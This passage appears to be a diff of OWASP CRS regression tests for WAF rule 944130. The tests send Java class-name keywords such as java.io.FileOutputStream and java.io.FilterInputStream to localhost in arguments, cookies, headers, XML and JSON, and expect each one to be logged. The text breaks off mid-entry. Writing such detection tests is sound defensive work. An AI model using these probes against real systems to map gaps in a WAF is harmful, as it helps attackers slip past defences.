- headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.File" - output: - log_contains: "id \"944130\"" - - test_title: 944130-98 + - 
input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.File" + output: + log_contains: "id \"944130\"" + - test_id: 98 desc: "Content-Type application/json arg value includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.File\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-99 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.File\"}" + output: + log_contains: "id \"944130\"" + - test_id: 99 desc: "Content-Type application/json arg name includes keyword java.io.File" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - 
version: "HTTP/1.0" - data: "{\"java.io.File\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-100 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.File\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 100 desc: "Argument test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-101 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 101 desc: "Argument name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-102 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 102 desc: "Cookie test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-103 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id 
\"944130\"" + - test_id: 103 desc: "Cookie name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FileOutputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-104 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FileOutputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 104 desc: "Request header test includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FileOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-105 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FileOutputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 105 desc: "XML attribute value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-106 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 106 desc: "XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-107 + 
- input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 107 desc: "Nested XML element value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-108 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 108 desc: "Content-Type text/plain includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "test=java.io.FileOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-109 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FileOutputStream" + output: + log_contains: "id \"944130\"" + - test_id: 109 desc: "Content-Type application/json arg value includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FileOutputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-110 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FileOutputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 110 desc: "Content-Type application/json arg name includes keyword java.io.FileOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 
"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FileOutputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-111 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FileOutputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 111 desc: "Argument test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-112 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 112 desc: "Argument name 
includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-113 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 113 desc: "Cookie test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-114 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + 
Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 114 desc: "Cookie name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterInputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-115 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterInputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 115 desc: "Request header test includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterInputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-116 + - input: + 
dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterInputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 116 desc: "XML attribute value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-117 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 117 desc: "XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: 
"HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-118 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 118 desc: "Nested XML element value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-119 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 119 desc: "Content-Type text/plain includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: 
"gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterInputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-120 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterInputStream" + output: + log_contains: "id \"944130\"" + - test_id: 120 desc: "Content-Type application/json arg value includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterInputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-121 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterInputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 121 desc: "Content-Type application/json arg name includes keyword java.io.FilterInputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - 
headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterInputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-122 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterInputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 122 desc: "Argument test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterOutputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-123 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterOutputStream" + 
output: + log_contains: "id \"944130\"" + - test_id: 123 desc: "Argument name includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterOutputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-124 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterOutputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 124 desc: "Cookie test includes keyword java.io.FilterOutputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterOutputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-125 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
